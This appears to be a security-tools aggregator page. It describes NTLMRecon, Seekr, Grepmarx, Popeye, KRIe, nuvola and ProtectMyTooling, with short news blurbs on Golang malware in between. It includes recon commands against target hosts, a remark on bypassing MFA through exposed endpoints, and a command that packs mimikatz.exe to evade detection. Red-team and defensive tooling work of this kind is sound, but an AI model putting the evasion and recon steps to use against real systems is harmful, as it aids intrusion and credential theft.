NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints

By: Zion3R


NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.

The tool supports collecting metadata from the exposed NTLM authentication endpoints including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motiviations behind it's development and how we are approaching more advanced metadata collectoin within Chariot.


Why build a new version of this capability?

We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.

Installation

The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.

go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest

Usage

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:

NTLMRecon -t https://autodiscover.contoso.com

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:

NTLMRecon -t https://autodiscover.contoso.com -o json

Example JSON Output

Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:

{
"url": "https://autodiscover.contoso.com/EWS/",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "msexch1.na.contoso.local",
"forestName": "contoso.local"
}
}
➜  ~ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
"url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "corp.contoso.com",
"dnsComputerName": "MSEXCH1.corp.contoso.com",
"forestName": "contoso.com"
}
}
➜ ~ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
➜ ~

Potential Additional Features

Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:

  • Concurrency and Performance Improvements: There could be some additional improvements to concurrency and performance. Currently, the tool sequentially makes HTTP requests and waits for the previous request to be performed.
  • Batch Scanning Functionality: Another idea would be to extend the NTLMRecon utility to accept a list of hosts from standard input. One usage scenario for this could be an attacker running a combination of β€œsubfinder | httpx | NTLMRecon” to enumerate HTTP servers and then identify NTLM authentication endpoints that are exposed externally across an entire attack surface.
  • One-off Data Collection Capability: A user may wish to perform one-off data collection targeting a specific endpoint which is currently not supported by NTLMRecon.
  • User-Agent Randomization or Control: A user may wish to randomize the user-agents used to make requests. Alternatively when targeting Microsoft Exchange servers sometimes using a user-agent with a mobile client or legacy third-party email client can allow requests to the /EWS/Exchange.asmx endpoint through, etc.

References

[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/



Seekr - A Multi-Purpose OSINT Toolkit With A Neat Web-Interface


A multi-purpose toolkit for gathering and managing OSINT-Data with a neat web-interface.


Introduction

Seekr is a multi-purpose toolkit for gathering and managing OSINT-data with a sleek web interface. The backend is written in Go and offers a wide range of features for data collection, organization, and analysis. Whether you're a researcher, investigator, or just someone looking to gather information, seekr makes it easy to find and manage the data you need. Give it a try and see how it can streamline your OSINT workflow!

Check the wiki for setup guide, etc.

Why use seekr over my current tool ?

Seekr combines note taking and OSINT in one application. Seekr can be used alongside your current tools. Seekr is desingned with OSINT in mind and optimized for real world usecases.

Key features

  • Database for OSINT targets
  • GitHub to email
  • Account cards for each person in the database
  • Account discovery intigrating with the account cards
  • Pre defined commonly used fields in the database

Getting Started - Installation

Windows

Download the latest exe here

Linux (stable)

Download the latest stable binary here

Linux (unstable)

To install seekr on linux simply run:

git clone https://github.com/seekr-osint/seekr
cd seekr
go run main.go

Now open the web interface in your browser of choice.

Run on NixOS

Seekr is build with NixOS in mind and therefore supports nix flakes. To run seekr on NixOS run following commands.

nix shell github:seekr-osint/seekr
seekr

Intigrating seekr into your current workflow

journey
title How to Intigrate seekr into your current workflow.
section Initial Research
Create a person in seekr: 100: seekr
Simple web research: 100: Known tools
Account scan: 100: seekr
section Deeper account investigation
Investigate the accounts: 100: seekr, Known tools
Keep notes: 100: seekr
section Deeper Web research
Deep web research: 100: Known tools
Keep notes: 100: seekr
section Finishing the report
Export the person with seekr: 100: seekr
Done.: 100

Feedback

We would love to hear from you. Tell us about your opinions on seekr. Where do we need to improve?... You can do this by just opeing up an issue or maybe even telling others in your blog or somewhere else about your experience.

Legal Disclaimer

This tool is intended for legitimate and lawful use only. It is provided for educational and research purposes, and should not be used for any illegal or malicious activities, including doxxing. Doxxing is the practice of researching and broadcasting private or identifying information about an individual, without their consent and can be illegal. The creators and contributors of this tool will not be held responsible for any misuse or damage caused by this tool. By using this tool, you agree to use it only for lawful purposes and to comply with all applicable laws and regulations. It is the responsibility of the user to ensure compliance with all relevant laws and regulations in the jurisdiction in which they operate. Misuse of this tool may result in criminal and/or civil prosecut ion.



Grepmarx - A Source Code Static Analysis Platform For AppSec Enthusiasts


Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.

Features

SAST (Static Analysis Security Testing) capabilities:

  • Multiple languages support: C/C++, C#, Go, HTML, Java, Kotlin, JavaScript, TypeScript, OCaml, PHP, Python, Ruby, Bash, Rust, Scala, Solidity, Terraform, Swift
  • Multiple frameworks support: Spring, Laravel, Symfony, Django, Flask, Node.js, jQuery, Express, Angular...
  • 1600+ existing analysis rules
  • Easily extend analysis rules using Semgrep syntax: https://semgrep.dev/editor
  • Manage rules in rule packs to tailor code scanning

SCA (Software Composition Analysis) capabilities:

  • Multiple package-dependency formats support: NPM, Maven, Gradle, Composer, pip, Gopkg, Gem, Cargo, NuPkg, CSProj, PubSpec, Cabal, Mix, Conan, Clojure, Docker, GitHub Actions, Jenkins HPI, Kubernetes
  • SBOM (Software Bill-of-Materials) generation (CycloneDX compliant)

Extra

  • Analysis workbench designed to efficiently browse scan results
  • Scan code that doesn't compile
  • Comprehensive LOC (Lines of Code) counter
  • Inspector: automatic application features discovery
  • ... and a Dark Mode

Screenshots

Scan customization Analysis workbench Rule pack edition

Execution

Grepmarx is provided with a configuration to be executed in Docker and Gunicorn.

Docker execution


Make sure you have docker-composer installed on the system, and the docker daemon is running. The application can then be easily executed in a docker container. The steps:

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Start the app in Docker

$ sudo docker-compose pull && sudo docker-compose build && sudo docker-compose up -d

Visit http://localhost:5000 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Gunicorn


Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).

Install using pip

$ pip install gunicorn supervisor

Start the app using gunicorn binary

$ supervisord -c supervisord.conf

Visit http://localhost:8001 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Build from sources

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Install virtualenv modules

$ virtualenv env
$ source env/bin/activate

Install Python modules

PostgreSQL connector (Production) $ # pip install -r requirements-pgsql.txt" dir="auto">
$ # SQLite Database (Development)
$ pip3 install -r requirements.txt
$ # OR with PostgreSQL connector (Production)
$ # pip install -r requirements-pgsql.txt

Install additionnal requirements

# Dependency scan (cdxgen / depscan) requirements
$ sudo apt install npm openjdk-17-jdk maven gradle golang composer
$ sudo npm install -g @cyclonedx/cdxgen
$ pip install appthreat-depscan

A Redis server is required to queue security scans. Install the redis package with your favorite distro package manager, then:

$ redis-server

Set the FLASK_APP environment variable

$ export FLASK_APP=run.py
$ # Set up the DEBUG environment
$ # export FLASK_ENV=development

Start the celery worker process

$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach

Start the application (development mode)

$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)
$ # --port=5000 - specify the app port (default 5000)
$ flask run --host=0.0.0.0 --port=5000

Access grepmarx in browser: http://127.0.0.1:5000/

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Credits & Links



Grepmarx - Provided by Orange Cyberdefense.



New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks

A new Golang-based botnet dubbedΒ HinataBotΒ has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. "The malware binaries appear to have been named by the malware author after a character from the popular anime series, Naruto, with file name structures such as 'Hinata-<OS>-<Architecture>,'" AkamaiΒ saidΒ in a

Titan Stealer: A New Golang-Based Information Stealer Malware Emerges

A new Golang-based information stealer malware dubbedΒ Titan StealerΒ is being advertised by threat actors through their Telegram channel. "The stealer is capable of stealing a variety of information from infected Windows machines, including credential data from browsers and crypto wallets, FTP client details, screenshots, system information, and grabbed files," Uptycs security researchers

Ukraine Hit with New Golang-based 'SwiftSlicer' Wiper Malware in Latest Cyber Attack

Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbedΒ SwiftSlicer. ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "Once executed it deletes shadow

Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection

Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers. "The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOneΒ saidΒ in an analysis published today. A striking

Popeye - A Kubernetes Cluster Resource Sanitizer

Popeye - A Kubernetes Cluster Sanitizer

Popeye is a utility that scans live Kubernetes cluster and reports potential issues with deployed resources and configurations. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive overload one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.

Popeye is a readonly tool, it does not alter any of your Kubernetes resources in any way!


Installation

Popeye is available on Linux, OSX and Windows platforms.

  • Binaries for Linux, Windows and Mac are available as tarballs in the release page.

  • For OSX/Unit using Homebrew/LinuxBrew

    brew install derailed/popeye/popeye
  • Building from source Popeye was built using go 1.12+. In order to build Popeye from source you must:

    1. Clone the repo

    2. Add the following command in your go.mod file

      replace (
      github.com/derailed/popeye => MY_POPEYE_CLONED_GIT_REPO
      )
    3. Build and run the executable

      go run main.go

    Quick recipe for the impatient:

    # Clone outside of GOPATH
    git clone https://github.com/derailed/popeye
    cd popeye
    # Build and install
    go install
    # Run
    popeye

PreFlight Checks

  • Popeye uses 256 colors terminal mode. On `Nix system make sure TERM is set accordingly.

    export TERM=xterm-256color

Sanitizers

Popeye scans your cluster for best practices and potential issues. Currently, Popeye only looks at nodes, namespaces, pods and services. More will come soon! We are hoping Kubernetes friends will pitch'in to make Popeye even better.

The aim of the sanitizers is to pick up on misconfigurations, i.e. things like port mismatches, dead or unused resources, metrics utilization, probes, container images, RBAC rules, naked resources, etc...

Popeye is not another static analysis tool. It runs and inspect Kubernetes resources on live clusters and sanitize resources as they are in the wild!

Here is a list of some of the available sanitizers:

Resource Sanitizers Aliases

Node no
Conditions ie not ready, out of mem/disk, network, pids, etc
Pod tolerations referencing node taints
CPU/MEM utilization metrics, trips if over limits (default 80% CPU/MEM)

Namespace ns
Inactive
Dead namespaces

Pod po
Pod status
Containers statuses
ServiceAccount presence
CPU/MEM on containers over a set CPU/MEM limit (default 80% CPU/MEM)
Container image with no tags
Container image using latest tag
Resources request/limits presence
Probes liveness/readiness presence
Named ports and their references

Service svc
Endpoints presence
Matching pods labels
Named ports and their references

ServiceAccount sa
Unused, detects potentially unused SAs

Secrets sec
Unused, detects potentially unused secrets or associated keys

ConfigMap cm
Unused, detects potentially unused cm or associated keys

Deployment dp, deploy
Unused, pod template validation, resource utilization

StatefulSet sts
Unsed, pod template validation, resource utilization

DaemonSet ds
Unsed, pod template validation, resource utilization

PersistentVolume pv
Unused, check volume bound or volume error

PersistentVolumeClaim pvc
Unused, check bounded or volume mount error

HorizontalPodAutoscaler hpa
Unused, Utilization, Max burst checks

PodDisruptionBudget
Unused, Check minAvailable configuration pdb

ClusterRole
Unused cr

ClusterRoleBinding
Unused crb

Role
Unused ro

RoleBinding
Unused rb

Ingress
Valid ing

NetworkPolicy
Valid np

PodSecurityPolicy
Valid psp

You can also see the full list of codes

Save the report

To save the Popeye report to a file pass the --save flag to the command. By default it will create a temp directory and will store the report there, the path of the temp directory will be printed out on STDOUT. If you have the need to specify the output directory for the report, you can use the environment variable POPEYE_REPORT_DIR. By default, the name of the output file follow the following format : sanitizer_<cluster-name>_<time-UnixNano>.<output-extension> (e.g. : "sanitizer-mycluster-1594019782530851873.html"). If you have the need to specify the output file name for the report, you can pass the --output-file flag with the filename you want as parameter.

Example to save report in working directory:

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save

Example to save report in working directory in HTML format under the name "report.html" :

  $ POPEYE_REPORT_DIR=$(pwd) popeye --save --out html --output-file report.html

Save the report to S3

You can also save the generated report to an AWS S3 bucket (or another S3 compatible Object Storage) with providing the flag --s3-bucket. As parameter you need to provide the name of the S3 bucket where you want to store the report. To save the report in a bucket subdirectory provide the bucket parameter as bucket/path/to/report.

Underlying the AWS Go lib is used which is handling the credential loading. For more information check out the official documentation.

Example to save report to S3:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --out=json

If AWS sS3 is not your bag, you can further define an S3 compatible storage (OVHcloud Object Storage, Minio, Google cloud storage, etc...) using s3-endpoint and s3-region as so:

popeye --s3-bucket=NAME-OF-YOUR-S3-BUCKET/OPTIONAL/SUBDIRECTORY --s3-region YOUR-REGION --s3-endpoint URL-OF-THE-ENDPOINT

Run public Docker image locally

You don't have to build and/or install the binary to run popeye: you can just run it directly from the official docker repo on DockerHub. The default command when you run the docker container is popeye, so you just need to pass whatever cli args are normally passed to popeye. To access your clusters, map your local kube config directory into the container with -v :

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
derailed/popeye --context foo -n bar

Running the above docker command with --rm means that the container gets deleted when popeye exits. When you use --save, it will write it to /tmp in the container and then delete the container when popeye exits, which means you lose the output. To get around this, map /tmp to the container's /tmp. NOTE: You can override the default output directory location by setting POPEYE_REPORT_DIR env variable.

  docker run --rm -it \
-v $HOME/.kube:/root/.kube \
-e POPEYE_REPORT_DIR=/tmp/popeye \
-v /tmp:/tmp \
derailed/popeye --context foo -n bar --save --output-file my_report.txt

# Docker has exited, and the container has been deleted, but the file
# is in your /tmp directory because you mapped it into the container
$ cat /tmp/popeye/my_report.txt
<snip>

The Command Line

You can use Popeye standalone or using a spinach yaml config to tune the sanitizer. Details about the Popeye configuration file are below.

kubeconfig environment. popeye # Popeye uses a spinach config file of course! aka spinachyaml! popeye -f spinach.yml # Popeye a cluster using a kubeconfig context. popeye --context olive # Stuck? popeye help" dir="auto">
# Dump version info
popeye version
# Popeye a cluster using your current kubeconfig environment.
popeye
# Popeye uses a spinach config file of course! aka spinachyaml!
popeye -f spinach.yml
# Popeye a cluster using a kubeconfig context.
popeye --context olive
# Stuck?
popeye help

Output Formats

Popeye can generate sanitizer reports in a variety of formats. You can use the -o cli option and pick your poison from there.

Format Description Default Credits
standard The full monty output iconized and colorized yes
jurassic No icons or color like it's 1979
yaml As YAML
html As HTML
json As JSON
junit For the Java melancholic
prometheus Dumps report a prometheus scrappable metrics dardanel
score Returns a single cluster sanitizer score value (0-100) kabute

The SpinachYAML Configuration

A spinach.yml configuration file can be specified via the -f option to further configure the sanitizers. This file may specify the container utilization threshold and specific sanitizer configurations as well as resources that will be excluded from the sanitization.

NOTE: This file will change as Popeye matures!

Under the excludes key you can configure to skip certain resources, or certain checks by code. Here, resource types are indicated in a group/version/resource notation. Example: to exclude PodDisruptionBugdets, use the notation policy/v1/poddisruptionbudgets. Note that the resource name is written in the plural form and everything is spelled in lowercase. For resources without an API group, the group part is omitted (Examples: v1/pods, v1/services, v1/configmaps).

A resource is identified by a resource kind and a fully qualified resource name, i.e. namespace/resource_name.

For example, the FQN of a pod named fred-1234 in the namespace blee will be blee/fred-1234. This provides for differentiating fred/p1 and blee/p1. For cluster wide resources, the FQN is equivalent to the name. Exclude rules can have either a straight string match or a regular expression. In the latter case the regular expression must be indicated using the rx: prefix.

NOTE! Please be careful with your regex as more resources than expected may get excluded from the report with a loose regex rule. When your cluster resources change, this could lead to a sub-optimal sanitization. Once in a while it might be a good idea to run Popeye β€žconfiglessβ€œ to make sure you will recognize any new issues that may have arisen in your clusters…

Here is an example spinach file as it stands in this release. There is a fuller eks and aks based spinach file in this repo under spinach. (BTW: for new comers into the project, might be a great way to contribute by adding cluster specific spinach file PRs...)

# A Popeye sample configuration file
popeye:
# Checks resources against reported metrics usage.
# If over/under these thresholds a sanitization warning will be issued.
# Your cluster must run a metrics-server for these to take place!
allocations:
cpu:
underPercUtilization: 200 # Checks if cpu is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if cpu is over allocated by more than 50% at current load.
memory:
underPercUtilization: 200 # Checks if mem is under allocated by more than 200% at current load.
overPercUtilization: 50 # Checks if mem is over allocated by more than 50% usage at current load.

# Excludes excludes certain resources from Popeye scans
excludes:
v1/pods:
# In the monitoring namespace excludes all probes check on pod's containers.
- name: rx:monitoring
code s:
- 102
# Excludes all istio-proxy container scans for pods in the icx namespace.
- name: rx:icx/.*
containers:
# Excludes istio init/sidecar container from scan!
- istio-proxy
- istio-init
# ConfigMap sanitizer exclusions...
v1/configmaps:
# Excludes key must match the singular form of the resource.
# For instance this rule will exclude all configmaps named fred.v2.3 and fred.v2.4
- name: rx:fred.+\.v\d+
# Namespace sanitizer exclusions...
v1/namespaces:
# Exclude all fred* namespaces if the namespaces are not found (404), other error codes will be reported!
- name: rx:kube
codes:
- 404
# Exclude all istio* namespaces from being scanned.
- name: rx:istio
# Completely exclude horizontal pod autoscalers.
autoscaling/v1/horizontalpodautoscalers:
- name: rx:.*

# Configure node resources.
node:
# Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
limits:
# CPU checks if current CPU utilization on a node is greater than 90%.
cpu: 90
# Memory checks if current Memory utilization on a node is greater than 80%.
memory: 80

# Configure pod resources
pod:
# Restarts check the restarts count and triggers a lint warning if above threshold.
restarts:
3
# Check container resource utilization in percent.
# Issues a lint warning if about these threshold.
limits:
cpu: 80
memory: 75

# Configure a list of allowed registries to pull images from
registries:
- quay.io
- docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
name: popeye
namespace: popeye
spec:
schedule: "* */1 * * *" # Fire off Popeye once an hour
concurrencyPolicy: Forbid
jobTemplate:
spec:
template:
spec:
serviceAccountName: popeye
restartPolicy: Never
containers:
- name: popeye
image: derailed/popeye
imagePullPolicy: IfNotPresent
args:
- -o
- yaml
- --force-exit-zero
- true
resources:
limits:
cpu: 500m
memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
name: popeye
namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: popeye
rules:
- apiGroups: [""]
resources:
- configmaps
- deployments
- endpoints
- horizontalpodautoscalers
- namespaces
- nodes
- persistentvolumes
- persistentvolumeclaims
- pods
- secrets
- serviceaccounts
- services
- statefulsets
verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources:
- clusterroles
- clusterrolebindings
- roles
- rolebindings
verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
resources :
- pods
- nodes
verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: popeye
subjects:
- kind: ServiceAccount
name: popeye
namespace: popeye
roleRef:
kind: ClusterRole
name: popeye
apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in term of Sanitizer severity levels:

Level Icon Jurassic Color Description
Ok
βœ…
OK Green Happy!
Info
ο”Š
I BlueGreen FYI
Warn

W Yellow Potential Issue
Error
ο’₯
E Red Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when…

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many of open source projects and libraries. Our sincere appreciations to all the OSS contributors that work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


KRIe - Linux Kernel Runtime Integrity With eBPF


KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.

KRIe has been developed using CO-RE (Compile Once - Run Everywhere) so that it is compatible with a large range of kernel versions. If your kernel doesn't export its BTF debug information, KRIe will try to download it automatically from BTFHub. If your kernel isn't available on BTFHub, but you have been able to manually generate your kernel's BTF data, you can provide it in the configuration file (see below).


System requirements

This project was developed on Ubuntu Focal 20.04 (Linux Kernel 5.15) and has been tested on older releases down to Ubuntu Bionic 18.04 (Linux Kernel 4.15).

  • golang 1.18+
  • (optional) Kernel headers are expected to be installed in lib/modules/$(uname -r), update the Makefile with their location otherwise.
  • (optional) clang & llvm 14.0.6+

Optional fields are required to recompile the eBPF programs.

Build

  1. Since KRIe was built using CORE, you shouldn't need to rebuild the eBPF programs. That said, if you want still want to rebuild the eBPF programs, you can use the following command:
# ~ make build-ebpf
  1. To build KRIE, run:
# ~ make build
  1. To install KRIE (copy to /usr/bin/krie) run:
# ~ make install

Getting started

KRIe needs to run as root. Run sudo krie -h to get help.

# ~ krie -h
Usage:
krie [flags]

Flags:
--config string KRIe config file (default "./cmd/krie/run/config/default_config.yaml")
-h, --help help for krie

Configuration

## Log level, options are: panic, fatal, error, warn, info, debug or trace
log_level: debug

## JSON output file, leave empty to disable JSON output.
output: "/tmp/krie.json"

## BTF information for the current kernel in .tar.xz format (required only if KRIE isn't able to locate it by itself)
vmlinux: ""

## events configuration
events:
## action taken when an init_module event is detected
init_module: log

## action taken when an delete_module event is detected
delete_module: log

## action taken when a bpf event is detected
bpf: log

## action taken when a bpf_filter event is detected
bpf_filter: log

## action taken when a ptrace event is detected
ptrace: log

## action taken when a kprobe event is detected
kprobe: log

## action taken when a sysctl event is detected
sysctl:
action: log

## Default settings for sysctl programs (kernel 5.2+ only)
sysctl_default:
block_read_access: false
block_write_access: false

## Custom settings for sysctl programs (kernel 5.2+ only)
sysctl_parameters:
kernel/yama/ptrace_scope:
block_write_access: true
kernel/ftrace_enabled:
override_input_value_with: "1\n"

## action taken when a hooked_syscall_table event is detected
hooked_syscall_table: log

## action taken when a hooked_syscall event is detected
hooked_syscall: log

## kernel_parameter event configuration
kernel_parameter:
action: log
periodic_action: log
ticker: 1 # sends at most one event every [ticker] second(s)
list:
- symbol: system/kprobes_all_disarmed
expected_value: 0
size: 4
# - symbol: system/selinux_state
# expecte d_value: 256
# size: 2

# sysctl
- symbol: system/ftrace_dump_on_oops
expected_value: 0
size: 4
- symbol: system/kptr_restrict
expected_value: 0
size: 4
- symbol: system/randomize_va_space
expected_value: 2
size: 4
- symbol: system/stack_tracer_enabled
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_clone
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_apparmor_policy
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_bpf_disabled
expected_value: 1
size: 4
- symbol: system/ptrace_scope
expected_value: 2
size: 4
- symbol: system/sysctl_perf_event_paranoid
expected_value: 2
size: 4
- symbol: system/kexe c_load_disabled
expected_value: 1
size: 4
- symbol: system/dmesg_restrict
expected_value: 1
size: 4
- symbol: system/modules_disabled
expected_value: 0
size: 4
- symbol: system/ftrace_enabled
expected_value: 1
size: 4
- symbol: system/ftrace_disabled
expected_value: 0
size: 4
- symbol: system/sysctl_protected_fifos
expected_value: 1
size: 4
- symbol: system/sysctl_protected_hardlinks
expected_value: 1
size: 4
- symbol: system/sysctl_protected_regular
expected_value: 2
size: 4
- symbol: system/sysctl_protected_symlinks
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_userfaultfd
expected_value: 0
size: 4

## action to check when a regis ter_check fails on a sensitive kernel space hook point
register_check: log

Documentation

License

  • The golang code is under Apache 2.0 License.
  • The eBPF programs are under the GPL v2 License.


nuvola - Tool To Dump And Perform Automatic And Manual Security Analysis On Aws Environments Configurations And Services

nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environments configurations and services using predefined, extensible and custom rules created using a simple Yaml syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments (at the moment only AWS).

The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralised and lightweight digital twin.


Quick Start

Requirements

  • docker-compose installed
  • an AWS account configured to be used with awscli with full access to the cloud resources, better if in ReadOnly mode (the policy arn:aws:iam::aws:policy/ReadOnlyAccess is fine)

Setup

  1. Clone the repository
git clone --depth=1 https://github.com/primait/nuvola.git; cd nuvola
  1. Create and edit, if required, the .env file to set your DB username/password/URL
cp .env_example .env;
  1. Start the Neo4j docker instance
make start
  1. Build the tool
make build

Usage

  1. Firstly you need to dump all the supported AWS services configurations and load the data into the Neo4j database:
./nuvola dump -profile default_RO -outputdir ~/DumpDumpFolder -format zip
  1. To import a previously executed dump operation into the Neo4j database:
./nuvola assess -import ~/DumpDumpFolder/nuvola-default_RO_20220901.zip
  1. To only perform static assessments on the data loaded into the Neo4j database using the predefined ruleset:
./nuvola assess
  1. Or use Neo4j Browser to manually explore the digital twin.

About nuvola

To get started with nuvola and its database schema, check out the nuvola Wiki.

No data is sent or shared with Prima Assicurazioni.

How to contribute

  • reporting bugs and issues
  • reporting new improvements
  • reviewing issues and pull requests
  • fixing bugs and issues
  • creating new rules
  • improving the overall quality

Presentations

License

nuvola uses graph theory to reveal possible attack paths and security misconfigurations on cloud environments.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this repository and program. If not, see http://www.gnu.org/licenses/.



ProtectMyTooling - Multi-Packer Wrapper Letting Us Daisy-Chain Various Packers, Obfuscators And Other Red Team Oriented Weaponry


Script that wraps around multitude of packers, protectors, obfuscators, shellcode loaders, encoders, generators to produce complex protected Red Team implants. Your perfect companion in Malware Development CI/CD pipeline, helping watermark your artifacts, collect IOCs, backdoor and more.


ProtectMyToolingGUI.py

With ProtectMyTooling you can quickly obfuscate your binaries without having to worry about clicking through all the Dialogs, interfaces, menus, creating projects to obfuscate a single binary, clicking through all the options available and wasting time about all that nonsense. It takes you straight to the point - to obfuscate your tool.

Aim is to offer the most convenient interface possible and allow to leverage a daisy-chain of multiple packers combined on a single binary.

That's right - we can launch ProtectMyTooling with several packers at once:

C:\> py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

The above example will firstly pass mimikatz.exe to the Hyperion for obfuscation, and then the result will be provided to UPX for compression. Resulting with UPX(Hyperion(file))

Features

  • Supports multiple different PE Packers, .NET Obfuscators, Shellcode Loaders/Builders
  • Allows daisy-chaining packers where output from a packer is passed to the consecutive one: callobf,hyperion,upx will produce artifact UPX(Hyperion(CallObf(file)))
